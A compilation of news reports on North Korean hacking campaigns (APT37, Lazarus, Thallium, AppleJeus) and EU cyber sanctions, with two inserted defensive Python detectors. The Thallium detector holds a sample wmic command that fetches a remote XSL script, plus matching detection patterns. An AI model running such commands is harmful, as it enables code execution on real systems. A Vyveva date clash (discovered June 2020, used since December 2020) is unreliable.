
Internet Browser Vulnerabilities Exploited by North Korean Hackers to Implant Malware


A North Korean threat actor has been found exploiting two flaws in Internet Explorer to attack individuals with a custom implant, compromising a South Korean online daily newspaper as part of a strategic web compromise (SWC).

Volexity, a cybersecurity firm, has attributed these attacks to a threat actor tracked as InkySquid, better known by the monikers ScarCruft and APT37, a well-known North Korean hacking group. Daily NK, the publication in question, is believed to have hosted the malicious code from at least late March 2021 to early June 2021.

InkySquid has been exploiting the vulnerability since 2020, serving malicious JavaScript that is typically buried within legitimate code in attacks against Internet Explorer users.

According to the researchers, in early April this year Volexity identified suspicious code loaded via www.dailynk[.]com from malicious jquery[.]services subdomains. Two URLs were identified, listed below:

  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 

Volexity's researchers further noted that the "clever disguise of exploit code amongst legitimate code", together with the use of bespoke malware, helps the attackers evade detection.

The attacks involved tampering with the jQuery JavaScript libraries on the website so that they served further obfuscated code from a remote URL, which in turn exploited two Internet Explorer vulnerabilities that Microsoft patched in August 2020 and March 2021. A Cobalt Strike stager and a new backdoor called BLUELIGHT were deployed in this way.

  • CVE-2020-1380 (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability 
  • CVE-2021-26411 (CVSS score: 8.8) - Internet Explorer Memory Corruption Vulnerability 

Notably, both vulnerabilities were also exploited in the wild by North Korean hackers targeting security researchers working on vulnerability research and development, in a campaign uncovered earlier in January.

Once the Cobalt Strike stager has run, BLUELIGHT is deployed as a secondary payload: a full-featured remote access tool that gives complete control over the infected system.

Along with collecting system metadata and information about installed antivirus products, the malware can execute shellcode, harvest cookies and credentials from Internet Explorer, Microsoft Edge and Google Chrome, collect files, and execute arbitrary commands, with the results exfiltrated to a remote server.

North Korean Lazarus Group Attacks South African Freight Via New Weapon


The North Korean-backed Lazarus hacking group employed a new backdoor in targeted attacks against a South African freight and logistics company. ESET researchers first discovered the malware in June 2020, but further evidence suggests Lazarus has been using it in previous attacks going back to at least December 2020. 

The new backdoor, dubbed Vyveva, is one of the latest tools discovered in the Lazarus arsenal. Vyveva is capable of exfiltrating files, gathering information about the compromised machine and its drives, connecting to a command-and-control (C2) server and running arbitrary code. It also uses watchdogs that monitor newly connected drives and active user sessions, triggering new C2 connections on session or drive events.

While ESET researchers have not been able to identify the initial compromise vector, they have identified three main components of Vyveva: its installer, loader and backdoor. Vyveva also includes a 'timestomping' option that lets its operators manipulate a file's timestamps, either by copying metadata from other files on the system or by setting a random date between 2000 and 2004, to hide new or modified files.
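As an added example (not ESET's code and not from the report), the following Python applies three heuristics a forensic analyst would use to spot the timestomping just described, run over constructed MFT-style records: a $STANDARD_INFORMATION creation time earlier than the $FILE_NAME creation time, a creation year inside the 2000 to 2004 window, and a $STANDARD_INFORMATION time borrowed verbatim from another file. The record layout and file paths are assumptions for the example.

```python
from datetime import datetime

# Constructed MFT-style records (not real forensic data): for each file the
# creation time from $STANDARD_INFORMATION (SI), which user-mode code can set,
# and from $FILE_NAME (FN), which Windows normally maintains itself.
FILES = [
    {"path": r"C:\Windows\System32\kernel32.dll",
     "si_created": "2019-03-19T04:49:00Z", "fn_created": "2019-03-19T04:49:00Z"},
    {"path": r"C:\ProgramData\svc\helper.dll",
     "si_created": "2002-07-14T11:23:41Z", "fn_created": "2021-01-06T08:12:09Z"},
    {"path": r"C:\ProgramData\svc\loader.exe",
     "si_created": "2019-03-19T04:49:00Z", "fn_created": "2021-01-06T08:12:09Z"},
    {"path": r"C:\Users\victim\Documents\report.docx",
     "si_created": "2021-01-05T15:00:00Z", "fn_created": "2021-01-05T15:00:00Z"},
]

# The report says Vyveva either borrows timestamps from other files or picks a
# random date between 2000 and 2004; both leave traces the checks below look for.
WINDOW = (2000, 2004)


def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def timestomp_indicators(record, all_records):
    """Return the list of timestomping indicators for one file record."""
    si, fn = parse(record["si_created"]), parse(record["fn_created"])
    hits = []
    if si < fn:
        # A file cannot predate its own name entry; SI was pushed backwards.
        hits.append("si-before-fn")
    if WINDOW[0] <= si.year <= WINDOW[1]:
        hits.append("creation-in-2000-2004-window")
    if si != fn and any(r is not record and r["si_created"] == record["si_created"]
                        for r in all_records):
        # Same SI time as an unrelated file while disagreeing with its own FN.
        hits.append("si-borrowed-from-other-file")
    return hits


def find_timestomped(records):
    """Return (path, indicators) for every record with at least one indicator."""
    results = []
    for rec in records:
        hits = timestomp_indicators(rec, records)
        if hits:
            results.append((rec["path"], hits))
    return results


if __name__ == "__main__":
    for path, hits in find_timestomped(FILES):
        print(f"{path}: {', '.join(hits)}")
```

The SI-before-FN check is a heuristic: files moved between directories can also show it, so treat a single indicator as a lead rather than proof.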

“Vyveva shares multiple code similarities with older Lazarus samples that are detected by ESET technology. However, the similarities do not end there: the use of a fake TLS protocol in network communication, command-like execution chains, and the methods of using encryption and Tor services all point toward Lazarus. Hence, we can attribute Vyveva to this APT group with high confidence,” security researcher Filip Jurcacko stated.

According to the US government, the Lazarus group was formed in 2007; since then, researchers say, it has been responsible for the $80 million Bangladeshi bank heist and the HaoBao Bitcoin-stealing campaign. The group's activities were widely reported only after it was blamed for the 2014 cyber-attack on Sony Pictures Entertainment and the 2017 WannaCry ransomware attack, which hit countries including the US and Britain.

US Agencies Publish Advisory on North Korean Cryptocurrency Malware, AppleJeus


The Federal Bureau of Investigation (FBI), together with the Cybersecurity and Infrastructure Security Agency (CISA) and the Department of the Treasury, has released a joint advisory on North Korea's cyber threat to cryptocurrency and on recommended mitigations.

Working with US government partners, the FBI, CISA and Treasury assess that Lazarus Group, advanced persistent threat (APT) actors backed by the North Korean government, is targeting individuals and companies, including cryptocurrency exchanges and financial service providers, by distributing cryptocurrency trading applications that have been modified to include malware.

“This advisory marks another step by the U.S. Government to counter the ongoing and criminal North Korean global cryptocurrency theft scheme targeting finance, energy, and other sectors,” said CISA Acting Executive Assistant Director of Cybersecurity Matt Hartman. “The FBI, Treasury, and CISA continue to assess the evolving cyber threat posed by North Korea, cybercriminals, and other nation-state actors and are committed to providing organizations timely information and mitigations to combat these threats.” 

In the last year alone, these actors have targeted organizations in more than 30 countries for cryptocurrency theft. They clearly see modified cryptocurrency trading applications as a way of circumventing the international sanctions on North Korea: the applications give them access to cryptocurrency exchanges and let them steal cryptocurrency from victims' accounts.

The US government refers to the North Korean government's malicious cyber activity as HIDDEN COBRA. It has identified malware and indicators of compromise (IOCs) used to facilitate North Korean cryptocurrency theft; the malware is known to the cybersecurity community as "AppleJeus".

Since the malware was first found in 2018, North Korea has used several versions of AppleJeus. Initially, HIDDEN COBRA actors used websites that appeared to host legitimate cryptocurrency trading platforms, but they now also appear to use other infection vectors, such as phishing, social networking and social engineering, to get users to download the malware. Using AppleJeus, HIDDEN COBRA actors have targeted organizations in several sectors, including energy, finance, government, industry, technology and telecommunications.

Since it was discovered, several variants of AppleJeus have been found in the wild. Most are delivered as relatively simple applications from attacker-controlled websites that mimic legitimate cryptocurrency exchanges and firms.

“It is likely that these actors view modified cryptocurrency trading applications as a means to circumvent international sanctions on North Korea — the applications enable them to gain entry into companies that conduct cryptocurrency transactions and steal cryptocurrency from victim accounts,” states the report. 

For users who believe they have been affected by AppleJeus, the advisory recommends generating new keys or moving funds out of compromised cryptocurrency wallets, removing affected hosts from the network, running anti-malware scans on infected devices, and notifying the FBI, CISA or Treasury.

Is North Korea Planning Something Bigger in the Field of Cyber Crime?


North Korea's cybercrime capabilities grow with each passing day, despite the tight economic sanctions imposed by the United Nations and the United States in 2006 to deprive it of the funds needed for its nuclear program. North Korea has built up these capabilities by exploiting digital weaknesses across the globe.

North Korea's hacking groups, known as Lazarus Group or Hidden Cobra, have launched several cyber-attacks across the globe to raise money for its banned nuclear weapons program. Lazarus is suspected of being behind the well-known theft of nearly $80 million from the Bangladeshi central bank.

In 2017 the US Department of Homeland Security and the FBI released a cybersecurity bulletin describing North Korea's connection to several cyber-attacks on US businesses and critical infrastructure. In May 2020, North Korea recruited nearly 100 science and technology university graduates into its military to oversee its tactical planning systems. Approximately 100 hackers graduate from Mirim College, also known as the University of Automation.

According to defector testimony, North Korea trains Mirim College graduates to dismantle Microsoft Windows operating systems, build destructive computer viruses and write code in various programming languages. WannaCry, the North Korean-led ransomware attack of 2017, wrought havoc on more than 300,000 computers in 150 countries by exploiting vulnerabilities in the Microsoft Windows operating system.

According to US Army reports, the alarming thing is that North Korea is not acting alone: it has recruited nearly 6,000 cyber agents across the globe in four intelligence organizations. China is one of North Korea's supporters, aiding its illicit cyber activities through training and academic exchange. North Korean students often study at top Chinese science and technology universities such as the Harbin Institute of Technology (HIT), where they have access to advanced technology and equipment unavailable in their home country because of US and UN sanctions.

In November 2019, the chairman of North Korea's Education Commission and the Chinese Ministry of Education jointly signed the China-North Korea Education and Cooperation Agreement (2020-2030) to reinforce academic partnerships and postgraduate student exchanges. The agreement was intended to expand foreign exchange and higher education training programs, which, given the nature of the science and technology universities involved, may lead to increased cybercrime.

The U.S. government continues to expose new and dangerous cyber groups that pose a serious threat to international security and U.S. national interests. However, all is not lost for the United States and its allies: the U.S. Department of Justice can mandate cybersecurity audits for U.S. banks and financial institutions as part of deferred prosecution agreements, to boost compliance with the basic cybersecurity framework described by the Cybersecurity and Infrastructure Security Agency (CISA) and the Financial Action Task Force (FATF).

Thallium Altered the Installer of a Stock Investment App


This week, ESTsecurity Security Response Center (ESRC) reported that a North Korean hacking group had altered a private stock investment messaging application to deliver malicious code. The group, known as Thallium, delivered a Windows executable built with the Nullsoft Scriptable Install System (NSIS), a popular script-driven installer authoring tool for Microsoft Windows. According to the recently published report, Thallium, also referred to as APT37, targeted clients of a private stock investment messaging service in a software supply chain attack. Until recently the group relied mainly on phishing attacks, for example using Microsoft Office documents, to reach its victims. Thallium is now using other methods as well, for instance delivering trojanized Windows installers and macro-laden Office documents to target investors.

The Windows executable bundled malicious code with the genuine files of a legitimate stock investment application. ESTsecurity researchers described two ways in which the attackers leverage the "XSL Script Processing" technique. Inside the legitimate installer of the stock investment platform, the attackers injected commands that fetched a malicious XSL script from a rogue FTP server and executed it on Windows systems using the built-in wmic.exe utility.

The resulting installer, repackaged with NSIS, would appear to the user as a normal installation of the genuine stock investment application while quietly dropping the malicious content in the background. The next stage of the attack executes a VBScript that creates files and folders named 'OracleCache', 'PackageUninstall' and 'USODrive', among others, in the %ProgramData% directory. The payload then connects to the command-and-control (C2) server hosted at frog.smtper[.]co to receive further commands. By creating a rogue scheduled task called 'activate' under the deceptive directory 'Office 365__\Windows\Office', the malware achieves persistence, instructing the Windows Task Scheduler to run the dropped code every 15 minutes. The attackers monitor the infected system and, after an initial screening, deploy a Remote Access Trojan (RAT) on the machine.

ESTsecurity researchers also observed Microsoft Office documents, such as Excel spreadsheets containing macros, distributing the same XSL script payload. "ESRC is focusing on the way that the Thallium association is utilizing the 'XSL Script Processing' method not just in spear-phishing assaults dependent on noxious documents, yet besides for niche assaults including supply chain assaults," ESTsecurity's researchers added.
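As an added example (not ESRC's code and not from the report), the following Python shows detection logic a SOC could run over process-creation telemetry for the two observable steps of the chain above: wmic.exe pulling a stylesheet from a remote URL through its /format: switch (MITRE ATT&CK T1220, XSL Script Processing), and a schtasks /create that combines the deceptive 'Office 365__' task folder, a 15-minute repetition and a launcher under one of the named %ProgramData% folders. The Sysmon-style field names and the sample command lines are constructed for the example.

```python
import re

# Constructed Sysmon-style process-creation events used as sample input; the
# command lines are illustrative and not copied from ESRC's report.
EVENTS = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /format:"ftp://203.0.113.10/update.xsl"'},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic logicaldisk get name"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": (r'schtasks /create /tn "Office 365__\Windows\Office\activate" '
                 r'/sc minute /mo 15 /tr "wscript.exe C:\ProgramData\USODrive\run.vbs"')},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "Backup\Nightly" /sc daily /tr "C:\Tools\backup.exe"'},
]

# wmic's /format: switch accepts a URL; a remote stylesheet is the tell for
# XSL Script Processing, whereas a local stylesheet is routine administration.
REMOTE_XSL = re.compile(r'/format:\s*"?(?:https?|ftp)://', re.I)
TASK_NAME = re.compile(r'/tn\s+"([^"]+)"', re.I)
MINUTE_INTERVAL = re.compile(r'/sc\s+minute\s+/mo\s+(\d+)', re.I)
# Folder names the report says the VBScript stage creates under %ProgramData%.
DROP_DIRS = ("OracleCache", "PackageUninstall", "USODrive")


def task_indicators(cmdline):
    """Return independent signs that a schtasks /create line matches the chain."""
    hits = []
    name = TASK_NAME.search(cmdline)
    if name and "office 365__" in name.group(1).lower():
        hits.append("deceptive-task-folder")
    interval = MINUTE_INTERVAL.search(cmdline)
    if interval and int(interval.group(1)) <= 15:
        hits.append("short-repeat-interval")
    if re.search(r"programdata\\(" + "|".join(DROP_DIRS) + r")\\", cmdline, re.I):
        hits.append("programdata-drop-dir")
    return hits


def analyze(events):
    """Return (event index, rule name) for each event that matches a rule."""
    findings = []
    for i, ev in enumerate(events):
        image, cmd = ev["image"].lower(), ev["cmdline"]
        if image.endswith("wmic.exe") and REMOTE_XSL.search(cmd):
            findings.append((i, "wmic-remote-xsl"))
        elif image.endswith("schtasks.exe") and "/create" in cmd.lower():
            # Require two independent indicators so a lone 15-minute task
            # created by legitimate software does not raise an alert.
            if len(task_indicators(cmd)) >= 2:
                findings.append((i, "deceptive-scheduled-task"))
    return findings
```

Calling analyze(EVENTS) flags the first and third events; the benign wmic query and the nightly backup task pass untouched.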

The Council of the EU and Its First-Ever Sanctions against Persons or Entities Involved in Various Cyber-Attacks

The Council of the European Union has imposed its first-ever sanctions against persons and entities involved in various cyber-attacks targeting European citizens and EU member states.

The sanctions include a travel ban preventing the listed individuals from entering any EU country, and an asset freeze on both the persons and the entities.

The order applies to six individuals and three entities responsible for or involved in various cyber-attacks. The six individuals comprise two Chinese citizens and four Russian nationals.

The entities involved in carrying out these cyber-attacks include an export firm based in North Korea and technology companies from China and Russia.

The cyber-attacks in question include the publicly known 'WannaCry', 'NotPetya' and 'Operation Cloud Hopper' campaigns, as well as an attempted cyber-attack against the Organisation for the Prohibition of Chemical Weapons.

According to the European Council, the sanctioned persons and entities are:

1. Two Chinese individuals, Gao Qiang and Zhang Shilong, and a technology firm, Tianjin Huaying Haitai Science and Technology Development Co. Ltd, for Operation Cloud Hopper.

2. Four Russian nationals (also wanted by the FBI), Alexey Valeryevich, Aleksei Sergeyvich, Evgenii Mikhaylovich and Oleg Mikhaylovich, for attempting to target the Organisation for the Prohibition of Chemical Weapons (OPCW) in the Netherlands.

3. A Russian technology firm (exposed by the NSA), the Main Centre for Special Technologies (GTsST) of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation, for the NotPetya ransomware attack in 2017 and the cyber-attacks on the Ukrainian power grid in the winters of 2015 and 2016.

4. A North Korean export firm, Chosun Expo, for the WannaCry ransomware attack, which disrupted information systems worldwide in 2017, and for its links to the well-known Lazarus group.

The Council says, “Sanctions are one of the options available in the EU's cyber diplomacy toolbox to prevent, deter and respond to malicious cyber activities directed against the EU or its member states, and today is the first time the EU has used this tool." 

According to the European Union, the two Chinese nationals who carried out Operation Cloud Hopper are members of the APT10 threat actor group, also known as 'Red Apollo', 'Stone Panda', 'MenuPass' and 'Potassium'.

The four Russian nationals were agents of the Russian intelligence agency GRU who attempted to hack into the OPCW's Wi-Fi network, which, had it succeeded, would have allowed them to compromise the OPCW's ongoing investigative work.